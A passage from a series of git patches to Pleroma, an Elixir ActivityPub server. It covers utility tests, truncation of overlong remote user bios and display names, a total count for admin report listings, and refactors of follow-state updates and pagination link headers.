+ assert {:ok, %Activity{} = activity} = ActivityPub.block(user1, user2)
+
+ assert Utils.fetch_latest_block(user1, user2) == activity
+ end
+ end
+
+ describe "recipient_in_message/3" do
+ test "returns true when recipient in `to`" do
+ recipient = insert(:user)
+ actor = insert(:user)
+ assert Utils.recipient_in_message(recipient, actor, %{"to" => recipient.ap_id})
+
+ assert Utils.recipient_in_message(
+ recipient,
+ actor,
+ %{"to" => [recipient.ap_id], "cc" => ""}
+ )
+ end
+
+ test "returns true when recipient in `cc`" do
+ recipient = insert(:user)
+ actor = insert(:user)
+ assert Utils.recipient_in_message(recipient, actor, %{"cc" => recipient.ap_id})
+
+ assert Utils.recipient_in_message(
+ recipient,
+ actor,
+ %{"cc" => [recipient.ap_id], "to" => ""}
+ )
+ end
+
+ test "returns true when recipient in `bto`" do
+ recipient = insert(:user)
+ actor = insert(:user)
+ assert Utils.recipient_in_message(recipient, actor, %{"bto" => recipient.ap_id})
+
+ assert Utils.recipient_in_message(
+ recipient,
+ actor,
+ %{"bcc" => "", "bto" => [recipient.ap_id]}
+ )
+ end
+
+ test "returns true when recipient in `bcc`" do
+ recipient = insert(:user)
+ actor = insert(:user)
+ assert Utils.recipient_in_message(recipient, actor, %{"bcc" => recipient.ap_id})
+
+ assert Utils.recipient_in_message(
+ recipient,
+ actor,
+ %{"bto" => "", "bcc" => [recipient.ap_id]}
+ )
+ end
+
+ test "returns true when message without addresses fields" do
+ recipient = insert(:user)
+ actor = insert(:user)
+ assert Utils.recipient_in_message(recipient, actor, %{"bccc" => recipient.ap_id})
+
+ assert Utils.recipient_in_message(
+ recipient,
+ actor,
+ %{"btod" => "", "bccc" => [recipient.ap_id]}
+ )
+ end
+
+ test "returns false" do
+ recipient = insert(:user)
+ actor = insert(:user)
+ refute Utils.recipient_in_message(recipient, actor, %{"to" => "ap_id"})
+ end
+ end
+
+ describe "lazy_put_activity_defaults/2" do
+ test "returns map with id and published data" do
+ note_activity = insert(:note_activity)
+ object = Object.normalize(note_activity)
+ res = Utils.lazy_put_activity_defaults(%{"context" => object.data["id"]})
+ assert res["context"] == object.data["id"]
+ assert res["context_id"] == object.id
+ assert res["id"]
+ assert res["published"]
+ end
+
+ test "returns map with fake id and published data" do
+ assert %{
+ "context" => "pleroma:fakecontext",
+ "context_id" => -1,
+ "id" => "pleroma:fakeid",
+ "published" => _
+ } = Utils.lazy_put_activity_defaults(%{}, true)
+ end
+
+ test "returns activity data with object" do
+ note_activity = insert(:note_activity)
+ object = Object.normalize(note_activity)
+
+ res =
+ Utils.lazy_put_activity_defaults(%{
+ "context" => object.data["id"],
+ "object" => %{}
+ })
+
+ assert res["context"] == object.data["id"]
+ assert res["context_id"] == object.id
+ assert res["id"]
+ assert res["published"]
+ assert res["object"]["id"]
+ assert res["object"]["published"]
+ assert res["object"]["context"] == object.data["id"]
+ assert res["object"]["context_id"] == object.id
+ end
+ end
+
+ describe "make_flag_data" do
+ test "returns empty map when params is invalid" do
+ assert Utils.make_flag_data(%{}, %{}) == %{}
+ end
+
+ test "returns map with Flag object" do
+ reporter = insert(:user)
+ target_account = insert(:user)
+ {:ok, activity} = CommonAPI.post(target_account, %{"status" => "foobar"})
+ context = Utils.generate_context_id()
+ content = "foobar"
+
+ target_ap_id = target_account.ap_id
+ activity_ap_id = activity.data["id"]
+
+ res =
+ Utils.make_flag_data(
+ %{
+ actor: reporter,
+ context: context,
+ account: target_account,
+ statuses: [%{"id" => activity.data["id"]}],
+ content: content
+ },
+ %{}
+ )
+
+ assert %{
+ "type" => "Flag",
+ "content" => ^content,
+ "context" => ^context,
+ "object" => [^target_ap_id, ^activity_ap_id],
+ "state" => "open"
+ } = res
+ end
+ end
+
+ describe "add_announce_to_object/2" do
+ test "adds actor to announcement" do
+ user = insert(:user)
+ object = insert(:note)
+
+ activity =
+ insert(:note_activity,
+ data: %{
+ "actor" => user.ap_id,
+ "cc" => [Pleroma.Constants.as_public()]
+ }
+ )
+
+ assert {:ok, updated_object} = Utils.add_announce_to_object(activity, object)
+ assert updated_object.data["announcements"] == [user.ap_id]
+ assert updated_object.data["announcement_count"] == 1
+ end
+ end
+
+ describe "remove_announce_from_object/2" do
+ test "removes actor from announcements" do
+ user = insert(:user)
+ user2 = insert(:user)
+
+ object =
+ insert(:note,
+ data: %{"announcements" => [user.ap_id, user2.ap_id], "announcement_count" => 2}
+ )
+
+ activity = insert(:note_activity, data: %{"actor" => user.ap_id})
+
+ assert {:ok, updated_object} = Utils.remove_announce_from_object(activity, object)
+ assert updated_object.data["announcements"] == [user2.ap_id]
+ assert updated_object.data["announcement_count"] == 1
+ end
+ end
end
From a890451187f0b1507be96ccf144b18fdb8294dd8 Mon Sep 17 00:00:00 2001
From: Maksim Pechnikov
Date: Wed, 4 Sep 2019 17:42:27 +0300
Subject: [PATCH 033/272] fetch_announcements -> take_announcements
---
lib/pleroma/web/activity_pub/utils.ex | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/lib/pleroma/web/activity_pub/utils.ex b/lib/pleroma/web/activity_pub/utils.ex
index cf82d1a9b..0d87b9220 100644
--- a/lib/pleroma/web/activity_pub/utils.ex
+++ b/lib/pleroma/web/activity_pub/utils.ex
@@ -518,7 +518,7 @@ def add_announce_to_object(
%Activity{data: %{"actor" => actor, "cc" => [Pleroma.Constants.as_public()]}},
object
) do
- announcements = fetch_announcements(object)
+ announcements = take_announcements(object)
with announcements <- Enum.uniq([actor | announcements]) do
update_element_in_object("announcement", announcements, object)
@@ -530,16 +530,16 @@ def add_announce_to_object(_, object), do: {:ok, object}
@spec remove_announce_from_object(Activity.t(), Object.t()) ::
{:ok, Object.t()} | {:error, Ecto.Changeset.t()}
def remove_announce_from_object(%Activity{data: %{"actor" => actor}}, object) do
- with announcements <- List.delete(fetch_announcements(object), actor) do
+ with announcements <- List.delete(take_announcements(object), actor) do
update_element_in_object("announcement", announcements, object)
end
end
- defp fetch_announcements(%{data: %{"announcements" => announcements}} = _)
+ defp take_announcements(%{data: %{"announcements" => announcements}} = _)
when is_list(announcements),
do: announcements
- defp fetch_announcements(_), do: []
+ defp take_announcements(_), do: []
#### Unfollow-related helpers
From 2975da284b75c846a99a56ce70a91ebc3cc43f33 Mon Sep 17 00:00:00 2001
From: Sadposter
Date: Wed, 4 Sep 2019 15:45:40 +0100
Subject: [PATCH 034/272] truncate remote user bio/display name
---
lib/pleroma/user.ex | 16 +++++++++++++++-
test/user_test.exs | 45 +++++++++++++++++++++++++++++----------------
2 files changed, 44 insertions(+), 17 deletions(-)
diff --git a/lib/pleroma/user.ex b/lib/pleroma/user.ex
index 29fd6d2ea..87e56b5b4 100644
--- a/lib/pleroma/user.ex
+++ b/lib/pleroma/user.ex
@@ -174,11 +174,25 @@ def following_count(%User{} = user) do
|> Repo.aggregate(:count, :id)
end
+ defp truncate_if_exists(params, key, max_length) do
+ if Map.has_key?(params, key) do
+ {value, _chopped} = String.split_at(params[key], max_length)
+ Map.put(params, key, value)
+ else
+ params
+ end
+ end
+
def remote_user_creation(params) do
bio_limit = Pleroma.Config.get([:instance, :user_bio_length], 5000)
name_limit = Pleroma.Config.get([:instance, :user_name_length], 100)
- params = Map.put(params, :info, params[:info] || %{})
+ params =
+ params
+ |> Map.put(:info, params[:info] || %{})
+ |> truncate_if_exists(:name, name_limit)
+ |> truncate_if_exists(:bio, bio_limit)
+
info_cng = User.Info.remote_user_creation(%User.Info{}, params[:info])
changes =
diff --git a/test/user_test.exs b/test/user_test.exs
index 92a48f630..45f998ff8 100644
--- a/test/user_test.exs
+++ b/test/user_test.exs
@@ -570,22 +570,6 @@ test "it has required fields" do
refute cs.valid?
end)
end
-
- test "it restricts some sizes" do
- bio_limit = Pleroma.Config.get([:instance, :user_bio_length], 5000)
- name_limit = Pleroma.Config.get([:instance, :user_name_length], 100)
-
- [bio: bio_limit, name: name_limit]
- |> Enum.each(fn {field, size} ->
- string = String.pad_leading(".", size)
- cs = User.remote_user_creation(Map.put(@valid_remote, field, string))
- assert cs.valid?
-
- string = String.pad_leading(".", size + 1)
- cs = User.remote_user_creation(Map.put(@valid_remote, field, string))
- refute cs.valid?
- end)
- end
end
describe "followers and friends" do
@@ -1142,6 +1126,35 @@ test "with overly long fields" do
assert {:ok, %User{}} = User.insert_or_update_user(data)
end
+
+ test "with an overly long bio" do
+ current_max_length = Pleroma.Config.get([:instance, :user_bio_length], 5000)
+ user = insert(:user, nickname: "nickname@supergood.domain")
+
+ data = %{
+ ap_id: user.ap_id,
+ name: user.name,
+ nickname: user.nickname,
+ bio: String.duplicate("h", current_max_length + 1),
+ info: %{}
+ }
+
+ assert {:ok, %User{}} = User.insert_or_update_user(data)
+ end
+
+ test "with an overly long display name" do
+ current_max_length = Pleroma.Config.get([:instance, :user_name_length], 100)
+ user = insert(:user, nickname: "nickname@supergood.domain")
+
+ data = %{
+ ap_id: user.ap_id,
+ name: String.duplicate("h", current_max_length + 1),
+ nickname: user.nickname,
+ info: %{}
+ }
+
+ assert {:ok, %User{}} = User.insert_or_update_user(data)
+ end
end
describe "per-user rich-text filtering" do
From cb99cfcc65f57f0044117ebd12d040488343d9ef Mon Sep 17 00:00:00 2001
From: Sadposter
Date: Wed, 4 Sep 2019 15:57:42 +0100
Subject: [PATCH 035/272] don't try to truncate non-strings
---
lib/pleroma/user.ex | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/lib/pleroma/user.ex b/lib/pleroma/user.ex
index 87e56b5b4..e2ebce6fc 100644
--- a/lib/pleroma/user.ex
+++ b/lib/pleroma/user.ex
@@ -175,7 +175,7 @@ def following_count(%User{} = user) do
end
defp truncate_if_exists(params, key, max_length) do
- if Map.has_key?(params, key) do
+ if Map.has_key?(params, key) and is_binary(params[key]) do
{value, _chopped} = String.split_at(params[key], max_length)
Map.put(params, key, value)
else
From af746fa4a814dbacd4fe4a3e58b1ee1732363d22 Mon Sep 17 00:00:00 2001
From: Maxim Filippov
Date: Wed, 4 Sep 2019 20:08:13 +0300
Subject: [PATCH 036/272] Return total for reports
---
CHANGELOG.md | 3 ++-
docs/api/admin_api.md | 1 +
lib/pleroma/web/admin_api/admin_api_controller.ex | 6 ++----
lib/pleroma/web/admin_api/views/report_view.ex | 3 ++-
test/web/admin_api/admin_api_controller_test.exs | 8 ++++++++
5 files changed, 15 insertions(+), 6 deletions(-)
diff --git a/CHANGELOG.md b/CHANGELOG.md
index a414ba5e0..942605f28 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -21,7 +21,8 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
- Mastodon API: Unsubscribe followers when they unfollow a user
- AdminAPI: Add "godmode" while fetching user statuses (i.e. admin can see private statuses)
- Improve digest email template
-– Pagination: (optional) return `total` alongside with `items` when paginating
+- Pagination: (optional) return `total` alongside with `items` when paginating
+- Admin API: Return `total` when querying for reports
### Fixed
- Following from Osada
diff --git a/docs/api/admin_api.md b/docs/api/admin_api.md
index d79c342be..5a090c720 100644
--- a/docs/api/admin_api.md
+++ b/docs/api/admin_api.md
@@ -313,6 +313,7 @@ Note: Available `:permission_group` is currently moderator and admin. 404 is ret
```json
{
+ "total" : 1,
"reports": [
{
"account": {
diff --git a/lib/pleroma/web/admin_api/admin_api_controller.ex b/lib/pleroma/web/admin_api/admin_api_controller.ex
index 544b9d7d8..2a1cc59e5 100644
--- a/lib/pleroma/web/admin_api/admin_api_controller.ex
+++ b/lib/pleroma/web/admin_api/admin_api_controller.ex
@@ -442,11 +442,9 @@ def list_reports(conn, params) do
params
|> Map.put("type", "Flag")
|> Map.put("skip_preload", true)
+ |> Map.put("total", true)
- reports =
- []
- |> ActivityPub.fetch_activities(params)
- |> Enum.reverse()
+ reports = ActivityPub.fetch_activities([], params)
conn
|> put_view(ReportView)
diff --git a/lib/pleroma/web/admin_api/views/report_view.ex b/lib/pleroma/web/admin_api/views/report_view.ex
index a25f3f1fe..0b8745b2e 100644
--- a/lib/pleroma/web/admin_api/views/report_view.ex
+++ b/lib/pleroma/web/admin_api/views/report_view.ex
@@ -12,7 +12,8 @@ defmodule Pleroma.Web.AdminAPI.ReportView do
def render("index.json", %{reports: reports}) do
%{
- reports: render_many(reports, __MODULE__, "show.json", as: :report)
+ reports: render_many(reports[:items], __MODULE__, "show.json", as: :report),
+ total: reports[:total]
}
end
diff --git a/test/web/admin_api/admin_api_controller_test.exs b/test/web/admin_api/admin_api_controller_test.exs
index 4e2c27431..b1ddd898b 100644
--- a/test/web/admin_api/admin_api_controller_test.exs
+++ b/test/web/admin_api/admin_api_controller_test.exs
@@ -1309,6 +1309,7 @@ test "returns empty response when no reports created", %{conn: conn} do
|> json_response(:ok)
assert Enum.empty?(response["reports"])
+ assert response["total"] == 0
end
test "returns reports", %{conn: conn} do
@@ -1331,6 +1332,8 @@ test "returns reports", %{conn: conn} do
assert length(response["reports"]) == 1
assert report["id"] == report_id
+
+ assert response["total"] == 1
end
test "returns reports with specified state", %{conn: conn} do
@@ -1364,6 +1367,8 @@ test "returns reports with specified state", %{conn: conn} do
assert length(response["reports"]) == 1
assert open_report["id"] == first_report_id
+ assert response["total"] == 1
+
response =
conn
|> get("/api/pleroma/admin/reports", %{
@@ -1376,6 +1381,8 @@ test "returns reports with specified state", %{conn: conn} do
assert length(response["reports"]) == 1
assert closed_report["id"] == second_report_id
+ assert response["total"] == 1
+
response =
conn
|> get("/api/pleroma/admin/reports", %{
@@ -1384,6 +1391,7 @@ test "returns reports with specified state", %{conn: conn} do
|> json_response(:ok)
assert Enum.empty?(response["reports"])
+ assert response["total"] == 0
end
test "returns 403 when requested by a non-admin" do
From 8306078de1abade082f932cda5b8d9297bdcdc80 Mon Sep 17 00:00:00 2001
From: Maksim
Date: Wed, 4 Sep 2019 17:31:14 +0000
Subject: [PATCH 037/272] Apply suggestion to
lib/pleroma/web/activity_pub/utils.ex
---
lib/pleroma/web/activity_pub/utils.ex | 33 +++++++++++----------------
1 file changed, 13 insertions(+), 20 deletions(-)
diff --git a/lib/pleroma/web/activity_pub/utils.ex b/lib/pleroma/web/activity_pub/utils.ex
index 0d87b9220..2de02f607 100644
--- a/lib/pleroma/web/activity_pub/utils.ex
+++ b/lib/pleroma/web/activity_pub/utils.ex
@@ -356,26 +356,19 @@ def update_follow_state_for_all(
%Activity{data: %{"actor" => actor, "object" => object}} = activity,
state
) do
- query =
- from(activity in Activity,
- where: fragment("data->>'type' = 'Follow'"),
- where: fragment("data->>'state' = 'pending'"),
- where: fragment("data->>'actor' = ?", ^actor),
- where: fragment("data->>'object' = ?", ^object),
- update: [
- set: [
- data: fragment("jsonb_set(data, '{state}', ?)", ^state)
- ]
- ]
- )
-
- with {_, _} <- Repo.update_all(query, []),
- {_, _} <- User.set_follow_state_cache(actor, object, state),
- %Activity{} = activity <- Activity.get_by_id(activity.id) do
- {:ok, activity}
- else
- e -> {:error, e}
- end
+ "Follow"
+ |> Activity.Queries.by_type()
+ |> Activity.Queries.by_actor(actor)
+ |> Activity.Queries.by_object_id(object["id"])
+ |> where(fragment("data->>'state' = 'pending'"))
+ |> update(set: [data: fragment("jsonb_set(data, '{state}', ?)", ^state)])
+ |> Repo.update_all([])
+
+ User.set_follow_state_cache(actor, object, state)
+
+ activity = Activity.get_by_id(activity.id)
+
+ {:ok, activity}
end
def update_follow_state(
From e2011a667cdf5e67f257c9c30a02c206fb4df913 Mon Sep 17 00:00:00 2001
From: Maksim
Date: Wed, 4 Sep 2019 18:35:01 +0000
Subject: [PATCH 038/272] Apply suggestion to
lib/pleroma/web/activity_pub/utils.ex
---
lib/pleroma/web/activity_pub/utils.ex | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/lib/pleroma/web/activity_pub/utils.ex b/lib/pleroma/web/activity_pub/utils.ex
index 2de02f607..011acd48e 100644
--- a/lib/pleroma/web/activity_pub/utils.ex
+++ b/lib/pleroma/web/activity_pub/utils.ex
@@ -359,7 +359,7 @@ def update_follow_state_for_all(
"Follow"
|> Activity.Queries.by_type()
|> Activity.Queries.by_actor(actor)
- |> Activity.Queries.by_object_id(object["id"])
+ |> Activity.Queries.by_object_id(object)
|> where(fragment("data->>'state' = 'pending'"))
|> update(set: [data: fragment("jsonb_set(data, '{state}', ?)", ^state)])
|> Repo.update_all([])
From ae506ca997619f118d18703a9b0802246eb427d5 Mon Sep 17 00:00:00 2001
From: Maksim Pechnikov
Date: Wed, 4 Sep 2019 21:40:53 +0300
Subject: [PATCH 039/272] fix formatting
---
lib/pleroma/web/activity_pub/utils.ex | 26 +++++++++++++-------------
1 file changed, 13 insertions(+), 13 deletions(-)
diff --git a/lib/pleroma/web/activity_pub/utils.ex b/lib/pleroma/web/activity_pub/utils.ex
index 011acd48e..72e07b59d 100644
--- a/lib/pleroma/web/activity_pub/utils.ex
+++ b/lib/pleroma/web/activity_pub/utils.ex
@@ -356,19 +356,19 @@ def update_follow_state_for_all(
%Activity{data: %{"actor" => actor, "object" => object}} = activity,
state
) do
- "Follow"
- |> Activity.Queries.by_type()
- |> Activity.Queries.by_actor(actor)
- |> Activity.Queries.by_object_id(object)
- |> where(fragment("data->>'state' = 'pending'"))
- |> update(set: [data: fragment("jsonb_set(data, '{state}', ?)", ^state)])
- |> Repo.update_all([])
-
- User.set_follow_state_cache(actor, object, state)
-
- activity = Activity.get_by_id(activity.id)
-
- {:ok, activity}
+ "Follow"
+ |> Activity.Queries.by_type()
+ |> Activity.Queries.by_actor(actor)
+ |> Activity.Queries.by_object_id(object)
+ |> where(fragment("data->>'state' = 'pending'"))
+ |> update(set: [data: fragment("jsonb_set(data, '{state}', ?)", ^state)])
+ |> Repo.update_all([])
+
+ User.set_follow_state_cache(actor, object, state)
+
+ activity = Activity.get_by_id(activity.id)
+
+ {:ok, activity}
end
def update_follow_state(
From 736165c082d34ef4d52367ea8315c228a1df3944 Mon Sep 17 00:00:00 2001
From: Maxim Filippov
Date: Thu, 5 Sep 2019 16:54:34 +0300
Subject: [PATCH 040/272] Reverse reports list
---
lib/pleroma/web/admin_api/views/report_view.ex | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/lib/pleroma/web/admin_api/views/report_view.ex b/lib/pleroma/web/admin_api/views/report_view.ex
index 0b8745b2e..51b95ad5e 100644
--- a/lib/pleroma/web/admin_api/views/report_view.ex
+++ b/lib/pleroma/web/admin_api/views/report_view.ex
@@ -12,7 +12,8 @@ defmodule Pleroma.Web.AdminAPI.ReportView do
def render("index.json", %{reports: reports}) do
%{
- reports: render_many(reports[:items], __MODULE__, "show.json", as: :report),
+ reports:
+ render_many(reports[:items], __MODULE__, "show.json", as: :report) |> Enum.reverse(),
total: reports[:total]
}
end
From 40b3289c26137ee4d07c7fb79faf232714cc7592 Mon Sep 17 00:00:00 2001
From: Egor Kislitsyn
Date: Fri, 6 Sep 2019 17:08:47 +0700
Subject: [PATCH 041/272] Refactor `add_link_headers/7` -> `add_link_headers/3`
---
lib/pleroma/web/controller_helper.ex | 95 ++++++-------------
.../controllers/mastodon_api_controller.ex | 28 +++---
.../web/pleroma_api/pleroma_api_controller.ex | 27 ++----
3 files changed, 50 insertions(+), 100 deletions(-)
diff --git a/lib/pleroma/web/controller_helper.ex b/lib/pleroma/web/controller_helper.ex
index eeac9f503..b53a01955 100644
--- a/lib/pleroma/web/controller_helper.ex
+++ b/lib/pleroma/web/controller_helper.ex
@@ -34,79 +34,38 @@ defp param_to_integer(val, default) when is_binary(val) do
defp param_to_integer(_, default), do: default
- def add_link_headers(
- conn,
- method,
- activities,
- param \\ nil,
- params \\ %{},
- func3 \\ nil,
- func4 \\ nil
- ) do
- params =
- conn.params
- |> Map.drop(["since_id", "max_id", "min_id"])
- |> Map.merge(params)
+ def add_link_headers(conn, activities, extra_params \\ %{}) do
+ case List.last(activities) do
+ %{id: max_id} ->
+ params =
+ conn.params
+ |> Map.drop(Map.keys(conn.path_params))
+ |> Map.drop(["since_id", "max_id", "min_id"])
+ |> Map.merge(extra_params)
- last = List.last(activities)
+ limit =
+ params
+ |> Map.get("limit", "20")
+ |> String.to_integer()
- func3 = func3 || (&mastodon_api_url/3)
- func4 = func4 || (&mastodon_api_url/4)
+ min_id =
+ if length(activities) <= limit do
+ activities
+ |> List.first()
+ |> Map.get(:id)
+ else
+ activities
+ |> Enum.at(limit * -1)
+ |> Map.get(:id)
+ end
- if last do
- max_id = last.id
+ next_url = current_url(conn, Map.merge(params, %{max_id: max_id}))
+ prev_url = current_url(conn, Map.merge(params, %{min_id: min_id}))
- limit =
- params
- |> Map.get("limit", "20")
- |> String.to_integer()
+ put_resp_header(conn, "link", "<#{next_url}>; rel=\"next\", <#{prev_url}>; rel=\"prev\"")
- min_id =
- if length(activities) <= limit do
- activities
- |> List.first()
- |> Map.get(:id)
- else
- activities
- |> Enum.at(limit * -1)
- |> Map.get(:id)
- end
-
- {next_url, prev_url} =
- if param do
- {
- func4.(
- Pleroma.Web.Endpoint,
- method,
- param,
- Map.merge(params, %{max_id: max_id})
- ),
- func4.(
- Pleroma.Web.Endpoint,
- method,
- param,
- Map.merge(params, %{min_id: min_id})
- )
- }
- else
- {
- func3.(
- Pleroma.Web.Endpoint,
- method,
- Map.merge(params, %{max_id: max_id})
- ),
- func3.(
- Pleroma.Web.Endpoint,
- method,
- Map.merge(params, %{min_id: min_id})
- )
- }
- end
-
- conn
- |> put_resp_header("link", "<#{next_url}>; rel=\"next\", <#{prev_url}>; rel=\"prev\"")
- else
- conn
+ _ ->
+ conn
end
end
end
diff --git a/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex b/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
index 8dfad7a54..f30a21bcc 100644
--- a/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
+++ b/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
@@ -6,7 +6,7 @@ defmodule Pleroma.Web.MastodonAPI.MastodonAPIController do
use Pleroma.Web, :controller
import Pleroma.Web.ControllerHelper,
- only: [json_response: 3, add_link_headers: 5, add_link_headers: 4, add_link_headers: 3]
+ only: [json_response: 3, add_link_headers: 2, add_link_headers: 3]
alias Ecto.Changeset
alias Pleroma.Activity
@@ -365,7 +365,7 @@ def home_timeline(%{assigns: %{user: user}} = conn, params) do
|> Enum.reverse()
conn
- |> add_link_headers(:home_timeline, activities)
+ |> add_link_headers(activities)
|> put_view(StatusView)
|> render("index.json", %{activities: activities, for: user, as: :activity})
end
@@ -384,7 +384,7 @@ def public_timeline(%{assigns: %{user: user}} = conn, params) do
|> Enum.reverse()
conn
- |> add_link_headers(:public_timeline, activities, false, %{"local" => local_only})
+ |> add_link_headers(activities, %{"local" => local_only})
|> put_view(StatusView)
|> render("index.json", %{activities: activities, for: user, as: :activity})
end
@@ -398,7 +398,7 @@ def user_statuses(%{assigns: %{user: reading_user}} = conn, params) do
activities = ActivityPub.fetch_user_activities(user, reading_user, params)
conn
- |> add_link_headers(:user_statuses, activities, params["id"])
+ |> add_link_headers(activities)
|> put_view(StatusView)
|> render("index.json", %{
activities: activities,
@@ -422,7 +422,7 @@ def dm_timeline(%{assigns: %{user: user}} = conn, params) do
|> Pagination.fetch_paginated(params)
conn
- |> add_link_headers(:dm_timeline, activities)
+ |> add_link_headers(activities)
|> put_view(StatusView)
|> render("index.json", %{activities: activities, for: user, as: :activity})
end
@@ -523,7 +523,7 @@ def poll_vote(%{assigns: %{user: user}} = conn, %{"id" => id, "choices" => choic
def scheduled_statuses(%{assigns: %{user: user}} = conn, params) do
with scheduled_activities <- MastodonAPI.get_scheduled_activities(user, params) do
conn
- |> add_link_headers(:scheduled_statuses, scheduled_activities)
+ |> add_link_headers(scheduled_activities)
|> put_view(ScheduledActivityView)
|> render("index.json", %{scheduled_activities: scheduled_activities})
end
@@ -706,7 +706,7 @@ def notifications(%{assigns: %{user: user}} = conn, params) do
notifications = MastodonAPI.get_notifications(user, params)
conn
- |> add_link_headers(:notifications, notifications)
+ |> add_link_headers(notifications)
|> put_view(NotificationView)
|> render("index.json", %{notifications: notifications, for: user})
end
@@ -894,7 +894,7 @@ def hashtag_timeline(%{assigns: %{user: user}} = conn, params) do
|> Enum.reverse()
conn
- |> add_link_headers(:hashtag_timeline, activities, params["tag"], %{"local" => local_only})
+ |> add_link_headers(activities, %{"local" => local_only})
|> put_view(StatusView)
|> render("index.json", %{activities: activities, for: user, as: :activity})
end
@@ -910,7 +910,7 @@ def followers(%{assigns: %{user: for_user}} = conn, %{"id" => id} = params) do
end
conn
- |> add_link_headers(:followers, followers, user)
+ |> add_link_headers(followers)
|> put_view(AccountView)
|> render("accounts.json", %{for: for_user, users: followers, as: :user})
end
@@ -927,7 +927,7 @@ def following(%{assigns: %{user: for_user}} = conn, %{"id" => id} = params) do
end
conn
- |> add_link_headers(:following, followers, user)
+ |> add_link_headers(followers)
|> put_view(AccountView)
|> render("accounts.json", %{for: for_user, users: followers, as: :user})
end
@@ -1152,7 +1152,7 @@ def favourites(%{assigns: %{user: user}} = conn, params) do
|> Enum.reverse()
conn
- |> add_link_headers(:favourites, activities)
+ |> add_link_headers(activities)
|> put_view(StatusView)
|> render("index.json", %{activities: activities, for: user, as: :activity})
end
@@ -1179,7 +1179,7 @@ def user_favourites(%{assigns: %{user: for_user}} = conn, %{"id" => id} = params
|> Enum.reverse()
conn
- |> add_link_headers(:favourites, activities)
+ |> add_link_headers(activities)
|> put_view(StatusView)
|> render("index.json", %{activities: activities, for: for_user, as: :activity})
else
@@ -1200,7 +1200,7 @@ def bookmarks(%{assigns: %{user: user}} = conn, params) do
|> Enum.map(fn b -> Map.put(b.activity, :bookmark, Map.delete(b, :activity)) end)
conn
- |> add_link_headers(:bookmarks, bookmarks)
+ |> add_link_headers(bookmarks)
|> put_view(StatusView)
|> render("index.json", %{activities: activities, for: user, as: :activity})
end
@@ -1640,7 +1640,7 @@ def conversations(%{assigns: %{user: user}} = conn, params) do
end)
conn
- |> add_link_headers(:conversations, participations)
+ |> add_link_headers(participations)
|> json(conversations)
end
diff --git a/lib/pleroma/web/pleroma_api/pleroma_api_controller.ex b/lib/pleroma/web/pleroma_api/pleroma_api_controller.ex
index f4df3b024..d17ccf84d 100644
--- a/lib/pleroma/web/pleroma_api/pleroma_api_controller.ex
+++ b/lib/pleroma/web/pleroma_api/pleroma_api_controller.ex
@@ -5,7 +5,7 @@
defmodule Pleroma.Web.PleromaAPI.PleromaAPIController do
use Pleroma.Web, :controller
- import Pleroma.Web.ControllerHelper, only: [add_link_headers: 7]
+ import Pleroma.Web.ControllerHelper, only: [add_link_headers: 2]
alias Pleroma.Conversation.Participation
alias Pleroma.Notification
@@ -27,31 +27,22 @@ def conversation_statuses(
%{assigns: %{user: user}} = conn,
%{"id" => participation_id} = params
) do
- params =
- params
- |> Map.put("blocking_user", user)
- |> Map.put("muting_user", user)
- |> Map.put("user", user)
-
- participation =
- participation_id
- |> Participation.get(preload: [:conversation])
+ participation = Participation.get(participation_id, preload: [:conversation])
if user.id == participation.user_id do
+ params =
+ params
+ |> Map.put("blocking_user", user)
+ |> Map.put("muting_user", user)
+ |> Map.put("user", user)
+
activities =
participation.conversation.ap_id
|> ActivityPub.fetch_activities_for_context(params)
|> Enum.reverse()
conn
- |> add_link_headers(
- :conversation_statuses,
- activities,
- participation_id,
- params,
- nil,
- &pleroma_api_url/4
- )
+ |> add_link_headers(activities)
|> put_view(StatusView)
|> render("index.json", %{activities: activities, for: user, as: :activity})
end
From ab2f21e470f349f783f895f26da3041afcc3d73e Mon Sep 17 00:00:00 2001
From: Maksim Pechnikov
Date: Fri, 6 Sep 2019 21:50:00 +0300
Subject: [PATCH 042/272] tests for mastodon_api_controller.ex
---
lib/pleroma/object.ex | 7 +
lib/pleroma/user.ex | 22 +-
.../controllers/mastodon_api_controller.ex | 143 +++----
lib/pleroma/web/oauth/app.ex | 26 ++
lib/pleroma/web/twitter_api/twitter_api.ex | 2 +-
.../mastodon_api_controller_test.exs | 370 +++++++++++++++---
test/web/oauth/app_test.exs | 33 ++
7 files changed, 438 insertions(+), 165 deletions(-)
create mode 100644 test/web/oauth/app_test.exs
diff --git a/lib/pleroma/object.ex b/lib/pleroma/object.ex
index d58eb7f7d..4398b9739 100644
--- a/lib/pleroma/object.ex
+++ b/lib/pleroma/object.ex
@@ -228,4 +228,11 @@ def increase_vote_count(ap_id, name) do
_ -> :noop
end
end
+
+ @doc "Updates data field of an object"
+ def update_data(%Object{data: data} = object, attrs \\ %{}) do
+ object
+ |> Object.change(%{data: Map.merge(data || %{}, attrs)})
+ |> Repo.update()
+ end
end
diff --git a/lib/pleroma/user.ex b/lib/pleroma/user.ex
index 3aa245f2a..d9db985a6 100644
--- a/lib/pleroma/user.ex
+++ b/lib/pleroma/user.ex
@@ -499,6 +499,11 @@ def get_all_by_ap_id(ap_ids) do
|> Repo.all()
end
+ def get_all_by_ids(ids) do
+ from(u in __MODULE__, where: u.id in ^ids)
+ |> Repo.all()
+ end
+
# This is mostly an SPC migration fix. This guesses the user nickname by taking the last part
# of the ap_id and the domain and tries to get that user
def get_by_guessed_nickname(ap_id) do
@@ -770,6 +775,19 @@ def update_note_count(%User{} = user) do
|> update_and_set_cache()
end
+ def update_mascot(user, url) do
+ info_changeset =
+ User.Info.mascot_update(
+ user.info,
+ url
+ )
+
+ user
+ |> change()
+ |> put_embed(:info, info_changeset)
+ |> update_and_set_cache()
+ end
+
@spec maybe_fetch_follow_information(User.t()) :: User.t()
def maybe_fetch_follow_information(user) do
with {:ok, user} <- fetch_follow_information(user) do
@@ -917,9 +935,7 @@ def subscribe(subscriber, %{ap_id: ap_id}) do
def unsubscribe(unsubscriber, %{ap_id: ap_id}) do
